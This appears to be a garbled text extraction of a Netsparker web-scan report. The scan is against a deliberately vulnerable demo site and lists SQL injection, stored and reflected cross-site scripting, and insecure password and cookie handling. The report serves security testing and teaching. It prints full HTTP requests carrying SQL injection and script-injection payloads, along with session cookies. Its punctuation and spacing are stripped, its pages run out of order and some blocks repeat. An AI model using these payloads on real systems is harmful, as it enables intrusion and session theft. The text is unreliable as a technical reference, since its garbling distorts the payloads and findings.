RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
